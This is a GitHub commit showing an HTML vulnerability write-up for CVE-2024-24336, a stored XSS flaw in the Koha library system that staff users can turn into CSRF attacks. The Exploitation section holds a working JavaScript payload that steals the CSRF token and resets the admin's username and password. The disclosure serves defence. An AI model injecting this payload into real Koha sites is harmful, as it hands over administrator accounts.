-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
0 parents
commit 1e7e7ff
Showing
9 changed files
with
726 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,178 @@ | ||
<!DOCTYPE html> | ||
<html lang="en"> | ||
<head> | ||
<meta charset="UTF-8"> | ||
<meta name="viewport" content="width=device-width, initial-scale=1.0"> | ||
<link rel="stylesheet" href="styles.css"> | ||
<title>CVE-2024-24336</title> | ||
</head> | ||
<body> | ||
<div class="green snipcss-3NIWg"> | ||
<div class="container center headings--one-size"> | ||
<header class="header"> | ||
<div class="header__inner"> | ||
<div class="header__logo"> | ||
<a href="#"> | ||
<div class="logo"> | ||
Quantiano | ||
</div> | ||
</a> | ||
</div> | ||
<ul class="menu menu--mobile"> | ||
<li> | ||
<ul class="menu__dropdown"> | ||
<li> | ||
</li> | ||
<li> | ||
</li> | ||
</ul> | ||
</li> | ||
</ul> | ||
</div> | ||
<nav class="navigation-menu"> | ||
<ul class="navigation-menu__inner menu--desktop"> | ||
</ul> | ||
</nav> | ||
</header> | ||
<div class="content"> | ||
<article class="post"> | ||
<h1 class="post-title"> | ||
<a href="#"> | ||
CVE-2024-24336 | ||
</a> | ||
</h1> | ||
<div class="post-meta"> | ||
<time class="post-date"> | ||
2024-02-06 | ||
</time> | ||
<span class="post-author"> | ||
Nitipoom Jaroonchaipipat | ||
</span> | ||
</div><br> | ||
<hr> | ||
<div class="post-content"> | ||
<div> | ||
<h2 id="#"> | ||
Product detail | ||
<a href="#" class="hanchor" arialabel="Anchor"> | ||
⌗ | ||
</a> | ||
</h2> | ||
<ui>Affected product: Koha</ui><br> | ||
<ui>Affected version: 23.05.05.00 (This vulnerability was discovered on November 2023)</ui><br> | ||
<ui>Affected components: '/members/moremember.pl' and ‘/members/members-home.pl’</ui><br><br> | ||
<p class="image-description"> | ||
A multiple Cross-site scripting (XSS) vulnerability in the '/members/moremember.pl', and ‘/members/members-home.pl’ endpoints within Koha Library Management System version <= 23.05.05 allows malicious staff users to carry out CSRF attacks, including unauthorized changes to usernames and passwords of users visiting the affected page, via the 'Circulation note' and ‘Patrons Restriction’ components. | ||
</p> | ||
<hr> | ||
<h2 id="proof-of-concept"> | ||
Prerequisite | ||
<a href="#proof-of-concept" class="hanchor" arialabel="Anchor"> | ||
⌗ | ||
</a> | ||
</h2> | ||
<p > | ||
Install Koha from official Koha Github repository | ||
<a href="https://github.com/Koha-Community/Koha" target="_blank"> | ||
GitHub page | ||
</a><br> | ||
</p> | ||
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/0.png"><br> | ||
<p class="image-description">Installed Koha version 23.05.05</p><br> | ||
|
||
<hr> | ||
|
||
<h2 id="proof-of-concept"> | ||
Exploitation | ||
<a href="#proof-of-concept" class="hanchor" arialabel="Anchor"> | ||
⌗ | ||
</a> | ||
</h2> | ||
|
||
<p class="image-description"> | ||
1. We have 2 roles in the system. lead_admin and patrons_staff | ||
</p> | ||
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/1.jpg"><br><br> | ||
|
||
<p class="image-description"> | ||
2. Patrons_staff can only staff access into this web portal and add, modify, and view patron only | ||
</p> | ||
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/2.jpg"><br><br> | ||
|
||
<p class="image-description"> | ||
3. But patrons_staff with granted won’t be able to edit username for any user except the system admin (same level as default admin by the system) | ||
</p> | ||
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/3.jpg"><br><br> | ||
|
||
<p class="image-description"> | ||
4. Try with a simple xss payload on affected field | ||
</p> | ||
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/4.jpg"><br><br> | ||
|
||
<p class="image-description"> | ||
4. Try with a simple xss payload on affected field | ||
</p> | ||
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/4.jpg"><br><br> | ||
|
||
<p class="image-description"> | ||
5. Change from xss popup message to csrf for impact, since cookie had been set with httponly flag, so we couldn’t steal it. | ||
</p> | ||
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/5.jpg"><br><br> | ||
|
||
|
||
<code> | ||
<xmp> | ||
<script>var req = new XMLHttpRequest(); req.open('GET', '/cgi-bin/koha/members/member-password.pl?member=1', true); | ||
req.onreadystatechange = function() { if (req.readyState === 4 && req.status === 200) { | ||
var tokenMatch = req.responseText.match(/<input type="hidden" name="csrf_token" value="([^"]*)"/); | ||
if (tokenMatch) { alert('CSRF Token: ' + tokenMatch[1]); var forgedReq = new XMLHttpRequest(); | ||
forgedReq.open('POST', 'http://127.0.0.1:7002/cgi-bin/koha/members/member-password.pl', true); | ||
forgedReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); | ||
forgedReq.send('destination=&borrowernumber=1&member=1&newuserid=pwned_leadadmin&newpassword=P@ssw0rd&newpassword2=P@ssw0rd&csrf_token=' + | ||
encodeURIComponent(tokenMatch[1])); } } }; req.send();</script> | ||
</xmp> | ||
</code> | ||
|
||
<p class="image-description"> | ||
5. The above javascript code will force user send request along with CSRF token, which we will change username and password for default admin which has a number of 1 | ||
</p><br><br> | ||
|
||
<p class="image-description"> | ||
6. Exploitation in gif shows that malicious staff delivered csrf attack to lead admin successful and changed their username | ||
</p> | ||
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/6.gif"><br><br> | ||
|
||
|
||
|
||
</div> | ||
</div> | ||
</article> | ||
</div> | ||
<footer class="footer"> | ||
<div class="footer__inner"> | ||
<div class="copyright"> | ||
<span> | ||
© 2023 Powered by | ||
<a href="https://gohugo.io"> | ||
Hugo | ||
</a> | ||
</span> | ||
<span> | ||
:: | ||
<a href="https://github.com/panr/hugo-theme-terminal" target="_blank"> | ||
Theme | ||
</a> | ||
made by | ||
<a href="https://github.com/panr" target="_blank"> | ||
panr | ||
</a> | ||
</span> | ||
</div> | ||
</div> | ||
</footer> | ||
</body> | ||
</html> | ||
|
||
|
||
|
||
|
Oops, something went wrong.